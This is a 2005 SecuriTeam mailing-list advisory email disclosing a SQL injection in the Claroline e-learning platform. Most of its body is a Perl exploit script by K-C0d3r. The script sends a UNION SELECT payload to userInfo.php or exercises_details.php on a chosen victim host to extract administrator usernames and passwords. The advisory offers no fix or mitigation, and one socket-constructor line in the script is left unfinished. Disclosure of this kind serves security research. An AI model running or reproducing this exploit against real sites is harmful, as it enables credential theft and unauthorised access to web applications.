From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 19 Jun 2005 18:44:07 +0200
Subject: [EXPL] Claroline E-Learning Application Remote SQL Injection
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050619161109.EDE5057DF@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Claroline E-Learning Application Remote SQL Injection
------------------------------------------------------------------------
SUMMARY
Claroline is "an Open Source software based on PHP /MySQL. It's a
collaborative learning environment allowing teachers or education
institutions to create and administer courses through the web". An SQL
Injection vulnerability has been discovered discovered in Claroline
E-Learning, the following exploit code will return the username and
password of the administrator user of the product.
DETAILS
Exploit:
#!/usr/bin/perl
# Claroline E-Learning Application Remote SQL Exploit
# [K-C0d3r]
# This tools and to consider only himself to educational purpose
# Bug discovered by
# Greetz to mZ, 2b TUBE, off, rikky, str0ke, x0n3-h4ck, MWC
# [K-C0d3r]
use IO::Socket;
sub Usage {
print STDERR "Usage: KCcol-xpl.pl <www.victim.com> <path/dir>
<target_num>\n";
print STDERR "Targets:\n1 - userInfo.php\n";
print STDERR "2 - exercises_details.php\n";
exit;
}
if (@ARGV < 3)
{
Usage();
}
if (@ARGV > 3)
{
Usage();
}
if (@ARGV == 3)
{
$host = @ARGV[0];
$path = @ARGV[1];
$target = @ARGV[2];
print "[K-C0d3r] Claroline E-Learning Application Remote SQL Exploit
[K-C0d3r]\n";
print "[+] Connecting to $host\n";
$sqli =
"%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$sqli .= "%20FROM%20pn_users%20WHERE%20pn_uid=2/*";
$socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80,
print "[+] Injecting command ...\n";
if ($target == 1)
{
print $socket "GET http://$host/$path/userInfo.php?uInfo=-1$sqli
HTTP/1.1\nHost: $host\n\n Connection: Close\r\n\r\n";
while (<$socket>)
{
print $_;
exit;
}
}
if ($target == 2)
{
print $socket "GET
http://$host/$path/exercises_details.php?uInfo=-1$sqli HTTP/1.1\nHost:
$host\n\n Connection: Close\r\n\r\n";
while (<$socket>)
{
print $_;
exit;
}
}
}
ADDITIONAL INFORMATION
The information has been provided by K-C0d3r.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
